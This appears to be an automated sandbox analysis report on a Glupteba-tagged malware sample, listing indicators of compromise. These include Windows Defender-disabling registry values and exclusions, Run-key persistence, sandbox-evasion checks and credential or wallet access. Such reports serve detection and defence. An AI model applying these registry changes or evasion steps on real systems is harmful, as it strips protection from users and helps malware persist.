glupteba | 1aa2d32ab883de5d4097a6d4fe7718a401f68ce95e0d2aea63212dd905103948

Modify Existing Service

T1031

Disabling Security Tools

Processes:

iunMWhqpwqIzRC4E9zVK4PBR.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	iunMWhqpwqIzRC4E9zVK4PBR.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	iunMWhqpwqIzRC4E9zVK4PBR.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	iunMWhqpwqIzRC4E9zVK4PBR.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1"	iunMWhqpwqIzRC4E9zVK4PBR.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	iunMWhqpwqIzRC4E9zVK4PBR.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	iunMWhqpwqIzRC4E9zVK4PBR.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	iunMWhqpwqIzRC4E9zVK4PBR.exe

NyMaim
NyMaim is a malware with various capabilities written in C++ and first seen in 2013.
trojan nymaim
PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
loader privateloader
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 2 IoCs

Processes:

resource	yara_rule
behavioral1/memory/552-159-0x0000000002550000-0x000000000259A000-memory.dmp	family_redline
behavioral1/memory/552-160-0x0000000004D30000-0x0000000004D78000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader

Windows security bypass 2 TTPs 7 IoCs

evasion trojan

Disabling Security Tools

Modify Registry

Processes:

L5CCUbftxW_m2YwQJsnYTAsP.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	L5CCUbftxW_m2YwQJsnYTAsP.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	L5CCUbftxW_m2YwQJsnYTAsP.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	L5CCUbftxW_m2YwQJsnYTAsP.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\L5CCUbftxW_m2YwQJsnYTAsP.exe = "0"	L5CCUbftxW_m2YwQJsnYTAsP.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	L5CCUbftxW_m2YwQJsnYTAsP.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	L5CCUbftxW_m2YwQJsnYTAsP.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	L5CCUbftxW_m2YwQJsnYTAsP.exe

Enumerates VirtualBox registry keys 2 TTPs 5 IoCs

evasion

Query Registry

Virtualization/Sandbox Evasion

T1497

Processes:

Adblock.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VBoxGuest\Performance	Adblock.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VBoxMouse\Performance	Adblock.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VBoxService\Performance	Adblock.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VBoxSF\Performance	Adblock.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VBoxVideo\Performance	Adblock.exe

Modifies boot configuration data using bcdedit 14 IoCs

Processes:

bcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exe

pid	process
2952	bcdedit.exe
3004	bcdedit.exe
3012	bcdedit.exe
3060	bcdedit.exe
1464	bcdedit.exe
340	bcdedit.exe
2516	bcdedit.exe
2092	bcdedit.exe
2716	bcdedit.exe
1980	bcdedit.exe
2264	bcdedit.exe
2760	bcdedit.exe
2132	bcdedit.exe
956	bcdedit.exe

Downloads MZ/PE file

Drops file in Drivers directory 8 IoCs

Processes:

DnsService.exeDnsService.exeDnsService.exeDnsService.exeDnsService.exeDnsService.exeDnsService.execsrss.exe

description	ioc	process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	DnsService.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	DnsService.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	DnsService.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	DnsService.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	DnsService.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	DnsService.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	DnsService.exe
File created	C:\Windows\system32\drivers\Winmon.sys	csrss.exe

Executes dropped EXE 34 IoCs

Processes:

iunMWhqpwqIzRC4E9zVK4PBR.exe9CTf5dAp4bNsMmI_L01a38V_.exeL5CCUbftxW_m2YwQJsnYTAsP.exeqDY5aVcCU1dbUEr13IrlTIDK.exeLVaY_PCj_xc6lfHy32TqvuEZ.exeGhKDsCbn7zPS5pDBpEJ1GNxd.exec3ItUxuFaaIJd7G8cdcptY4S.exeX_om1kbHCXSTuY2xXFnbSC9I.exexVJiXIH0FM4CqB2OEeytcXZ6.exengv6jVRLGlmucpE9o_WwkMBD.exe9CTf5dAp4bNsMmI_L01a38V_.exe5ch06654oNHEAMWvsdbULnap.exe5ch06654oNHEAMWvsdbULnap.tmpVery.exe.pifRespect.exe.pifAdblock.execrashpad_handler.exeL5CCUbftxW_m2YwQJsnYTAsP.execsrss.exeDnsService.exeDnsService.exeDnsService.exepatch.exeinjector.exeAdblockInstaller.exeAdblockInstaller.tmpDnsService.exeAdblock.execrashpad_handler.exeDnsService.exeDnsService.exeDnsService.exedsefix.exetor.exe

pid	process
1668	iunMWhqpwqIzRC4E9zVK4PBR.exe
956	9CTf5dAp4bNsMmI_L01a38V_.exe
1936	L5CCUbftxW_m2YwQJsnYTAsP.exe
1732	qDY5aVcCU1dbUEr13IrlTIDK.exe
1080	LVaY_PCj_xc6lfHy32TqvuEZ.exe
1932	GhKDsCbn7zPS5pDBpEJ1GNxd.exe
868	c3ItUxuFaaIJd7G8cdcptY4S.exe
1104	X_om1kbHCXSTuY2xXFnbSC9I.exe
580	xVJiXIH0FM4CqB2OEeytcXZ6.exe
552	ngv6jVRLGlmucpE9o_WwkMBD.exe
1624	9CTf5dAp4bNsMmI_L01a38V_.exe
820	5ch06654oNHEAMWvsdbULnap.exe
1832	5ch06654oNHEAMWvsdbULnap.tmp
2024	Very.exe.pif
952	Respect.exe.pif
1096	Adblock.exe
1652	crashpad_handler.exe
2120	L5CCUbftxW_m2YwQJsnYTAsP.exe
2448	csrss.exe
2652	DnsService.exe
2684	DnsService.exe
2696	DnsService.exe
2860	patch.exe
3016	injector.exe
3044	AdblockInstaller.exe
3068	AdblockInstaller.tmp
1812	DnsService.exe
2364	Adblock.exe
2368	crashpad_handler.exe
2844	DnsService.exe
2832	DnsService.exe
2792	DnsService.exe
2116	dsefix.exe
2212	tor.exe

Modifies Windows Firewall 1 TTPs 3 IoCs
evasion

Modify Existing Service
T1031

Processes:

netsh.exenetsh.exenetsh.exe

pid process

2352 netsh.exe
2556 netsh.exe
2688 netsh.exe
Possible attempt to disable PatchGuard 2 TTPs
Rootkits can use kernel patching to embed themselves in an operating system.
evasion

Impair Defenses
T1562

Command-Line Interface
T1059

pid	process
2352	netsh.exe
2556	netsh.exe
2688	netsh.exe

UPX packed file 10 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
\Users\Admin\Pictures\Adobe Films\GhKDsCbn7zPS5pDBpEJ1GNxd.exe	upx
\Users\Admin\Pictures\Adobe Films\GhKDsCbn7zPS5pDBpEJ1GNxd.exe	upx
\Users\Admin\Pictures\Adobe Films\xVJiXIH0FM4CqB2OEeytcXZ6.exe	upx
\Users\Admin\Pictures\Adobe Films\xVJiXIH0FM4CqB2OEeytcXZ6.exe	upx
C:\Users\Admin\Pictures\Adobe Films\GhKDsCbn7zPS5pDBpEJ1GNxd.exe	upx
C:\Users\Admin\Pictures\Adobe Films\xVJiXIH0FM4CqB2OEeytcXZ6.exe	upx
behavioral1/memory/580-110-0x0000000000E70000-0x0000000002111000-memory.dmp	upx
behavioral1/memory/1932-121-0x0000000001290000-0x0000000002531000-memory.dmp	upx
behavioral1/memory/580-215-0x0000000000E70000-0x0000000002111000-memory.dmp	upx
behavioral1/memory/1932-218-0x0000000001290000-0x0000000002531000-memory.dmp	upx

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

T1082

Processes:

iunMWhqpwqIzRC4E9zVK4PBR.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Control Panel\International\Geo\Nation	iunMWhqpwqIzRC4E9zVK4PBR.exe

Drops startup file 1 IoCs

Processes:

Adblock.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Adblock Fast.lnk Adblock.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Adblock Fast.lnk	Adblock.exe

Loads dropped DLL 64 IoCs

Processes:

2a1363e9e6d309726686ef2d319eec73.exeiunMWhqpwqIzRC4E9zVK4PBR.exe5ch06654oNHEAMWvsdbULnap.exe5ch06654oNHEAMWvsdbULnap.tmpcrashpad_handler.execmd.execmd.exeAdblock.exeL5CCUbftxW_m2YwQJsnYTAsP.exepatch.execsrss.exeAdblockInstaller.exeAdblockInstaller.tmp

pid	process
812	2a1363e9e6d309726686ef2d319eec73.exe
1668	iunMWhqpwqIzRC4E9zVK4PBR.exe
1668	iunMWhqpwqIzRC4E9zVK4PBR.exe
1668	iunMWhqpwqIzRC4E9zVK4PBR.exe
1668	iunMWhqpwqIzRC4E9zVK4PBR.exe
1668	iunMWhqpwqIzRC4E9zVK4PBR.exe
1668	iunMWhqpwqIzRC4E9zVK4PBR.exe
1668	iunMWhqpwqIzRC4E9zVK4PBR.exe
1668	iunMWhqpwqIzRC4E9zVK4PBR.exe
1668	iunMWhqpwqIzRC4E9zVK4PBR.exe
1668	iunMWhqpwqIzRC4E9zVK4PBR.exe
1668	iunMWhqpwqIzRC4E9zVK4PBR.exe
1668	iunMWhqpwqIzRC4E9zVK4PBR.exe
1668	iunMWhqpwqIzRC4E9zVK4PBR.exe
1668	iunMWhqpwqIzRC4E9zVK4PBR.exe
1668	iunMWhqpwqIzRC4E9zVK4PBR.exe
820	5ch06654oNHEAMWvsdbULnap.exe
1832	5ch06654oNHEAMWvsdbULnap.tmp
1652	crashpad_handler.exe
1824	cmd.exe
836	cmd.exe
1832	5ch06654oNHEAMWvsdbULnap.tmp
1832	5ch06654oNHEAMWvsdbULnap.tmp
1096	Adblock.exe
1096	Adblock.exe
1096	Adblock.exe
1096	Adblock.exe
1096	Adblock.exe
1096	Adblock.exe
1096	Adblock.exe
2120	L5CCUbftxW_m2YwQJsnYTAsP.exe
2120	L5CCUbftxW_m2YwQJsnYTAsP.exe
1096	Adblock.exe
872
2860	patch.exe
2860	patch.exe
2860	patch.exe
2860	patch.exe
2860	patch.exe
1300
1300
1300
2448	csrss.exe
3044	AdblockInstaller.exe
3068	AdblockInstaller.tmp
1724
3068	AdblockInstaller.tmp
3068	AdblockInstaller.tmp
3068	AdblockInstaller.tmp
3068	AdblockInstaller.tmp
3068	AdblockInstaller.tmp
3068	AdblockInstaller.tmp
3068	AdblockInstaller.tmp
3068	AdblockInstaller.tmp
3068	AdblockInstaller.tmp
3068	AdblockInstaller.tmp
3068	AdblockInstaller.tmp
3068	AdblockInstaller.tmp
3068	AdblockInstaller.tmp
3068	AdblockInstaller.tmp
3068	AdblockInstaller.tmp
3068	AdblockInstaller.tmp
3068	AdblockInstaller.tmp
3068	AdblockInstaller.tmp

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Windows security modification 2 TTPs 7 IoCs

evasion trojan

Disabling Security Tools

Modify Registry

Processes:

L5CCUbftxW_m2YwQJsnYTAsP.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	L5CCUbftxW_m2YwQJsnYTAsP.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	L5CCUbftxW_m2YwQJsnYTAsP.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\L5CCUbftxW_m2YwQJsnYTAsP.exe = "0"	L5CCUbftxW_m2YwQJsnYTAsP.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	L5CCUbftxW_m2YwQJsnYTAsP.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	L5CCUbftxW_m2YwQJsnYTAsP.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	L5CCUbftxW_m2YwQJsnYTAsP.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	L5CCUbftxW_m2YwQJsnYTAsP.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

Processes:

qDY5aVcCU1dbUEr13IrlTIDK.exeLVaY_PCj_xc6lfHy32TqvuEZ.exeL5CCUbftxW_m2YwQJsnYTAsP.execsrss.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	qDY5aVcCU1dbUEr13IrlTIDK.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	LVaY_PCj_xc6lfHy32TqvuEZ.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	L5CCUbftxW_m2YwQJsnYTAsP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	csrss.exe
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce	LVaY_PCj_xc6lfHy32TqvuEZ.exe
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce	qDY5aVcCU1dbUEr13IrlTIDK.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

12 ipinfo.io
23 ipinfo.io
11 ipinfo.io

flow	ioc
12	ipinfo.io
23	ipinfo.io
11	ipinfo.io

Drops file in Program Files directory 2 IoCs

Processes:

2a1363e9e6d309726686ef2d319eec73.exe

description	ioc	process
File created	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	2a1363e9e6d309726686ef2d319eec73.exe
File opened for modification	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	2a1363e9e6d309726686ef2d319eec73.exe

Drops file in Windows directory 3 IoCs

Processes:

L5CCUbftxW_m2YwQJsnYTAsP.exemakecab.exe

description	ioc	process
File opened for modification	C:\Windows\rss	L5CCUbftxW_m2YwQJsnYTAsP.exe
File created	C:\Windows\rss\csrss.exe	L5CCUbftxW_m2YwQJsnYTAsP.exe
File created	C:\Windows\Logs\CBS\CbsPersist_20220908115734.cab	makecab.exe

Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exe

pid process

2964 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

pid	process
2964	sc.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

9CTf5dAp4bNsMmI_L01a38V_.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	9CTf5dAp4bNsMmI_L01a38V_.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	9CTf5dAp4bNsMmI_L01a38V_.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	9CTf5dAp4bNsMmI_L01a38V_.exe

Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

588 schtasks.exe
2784 schtasks.exe
2224 schtasks.exe
1836 schtasks.exe
Enumerates processes with tasklist 1 TTPs 4 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exetasklist.exetasklist.exe

pid process

1992 tasklist.exe
1156 tasklist.exe
1972 tasklist.exe
1960 tasklist.exe
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.

System Information Discovery
T1082

Command-Line Interface
T1059

Processes:

ipconfig.exe

pid process

2196 ipconfig.exe
Kills process with taskkill 3 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exe

pid process

468 taskkill.exe
1896 taskkill.exe
1396 taskkill.exe

pid	process
588	schtasks.exe
2784	schtasks.exe
2224	schtasks.exe
1836	schtasks.exe

pid	process
1992	tasklist.exe
1156	tasklist.exe
1972	tasklist.exe
1960	tasklist.exe

pid	process
2196	ipconfig.exe

pid	process
468	taskkill.exe
1896	taskkill.exe
1396	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 2 IoCs

adware spyware

Modify Registry

Processes:

Adblock.exeAdblock.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main	Adblock.exe
Key created	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main	Adblock.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

netsh.exeL5CCUbftxW_m2YwQJsnYTAsP.execsrss.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace	netsh.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	L5CCUbftxW_m2YwQJsnYTAsP.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-105 = "Central Brazilian Standard Time"	L5CCUbftxW_m2YwQJsnYTAsP.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-471 = "Ekaterinburg Daylight Time"	L5CCUbftxW_m2YwQJsnYTAsP.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-362 = "GTB Standard Time"	L5CCUbftxW_m2YwQJsnYTAsP.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-592 = "Malay Peninsula Standard Time"	L5CCUbftxW_m2YwQJsnYTAsP.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-602 = "Taipei Standard Time"	L5CCUbftxW_m2YwQJsnYTAsP.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-631 = "Tokyo Daylight Time"	L5CCUbftxW_m2YwQJsnYTAsP.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-392 = "Arab Standard Time"	L5CCUbftxW_m2YwQJsnYTAsP.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time"	L5CCUbftxW_m2YwQJsnYTAsP.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-461 = "Afghanistan Daylight Time"	L5CCUbftxW_m2YwQJsnYTAsP.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-104 = "Central Brazilian Daylight Time"	L5CCUbftxW_m2YwQJsnYTAsP.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-251 = "Dateline Daylight Time"	L5CCUbftxW_m2YwQJsnYTAsP.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-172 = "Central Standard Time (Mexico)"	L5CCUbftxW_m2YwQJsnYTAsP.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-681 = "E. Australia Daylight Time"	L5CCUbftxW_m2YwQJsnYTAsP.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-201 = "US Mountain Daylight Time"	L5CCUbftxW_m2YwQJsnYTAsP.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-100 = "DHCP Quarantine Enforcement Client"	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace\Session	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-1 = "IPsec Relying Party"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time"	L5CCUbftxW_m2YwQJsnYTAsP.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-448 = "Azerbaijan Daylight Time"	L5CCUbftxW_m2YwQJsnYTAsP.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time"	L5CCUbftxW_m2YwQJsnYTAsP.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-431 = "Iran Daylight Time"	L5CCUbftxW_m2YwQJsnYTAsP.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-372 = "Jerusalem Standard Time"	L5CCUbftxW_m2YwQJsnYTAsP.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-522 = "N. Central Asia Standard Time"	L5CCUbftxW_m2YwQJsnYTAsP.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-301 = "Romance Daylight Time"	L5CCUbftxW_m2YwQJsnYTAsP.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-101 = "Provides RD Gateway enforcement for NAP"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-651 = "AUS Central Daylight Time"	L5CCUbftxW_m2YwQJsnYTAsP.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-449 = "Azerbaijan Standard Time"	L5CCUbftxW_m2YwQJsnYTAsP.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-732 = "Fiji Standard Time"	L5CCUbftxW_m2YwQJsnYTAsP.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-335 = "Jordan Standard Time"	L5CCUbftxW_m2YwQJsnYTAsP.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-891 = "Morocco Daylight Time"	L5CCUbftxW_m2YwQJsnYTAsP.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1042 = "Ulaanbaatar Standard Time"	L5CCUbftxW_m2YwQJsnYTAsP.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1412 = "Syria Standard Time"	L5CCUbftxW_m2YwQJsnYTAsP.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-442 = "Arabian Standard Time"	L5CCUbftxW_m2YwQJsnYTAsP.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-342 = "Egypt Standard Time"	L5CCUbftxW_m2YwQJsnYTAsP.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-472 = "Ekaterinburg Standard Time"	L5CCUbftxW_m2YwQJsnYTAsP.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-731 = "Fiji Daylight Time"	L5CCUbftxW_m2YwQJsnYTAsP.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-352 = "FLE Standard Time"	L5CCUbftxW_m2YwQJsnYTAsP.exe
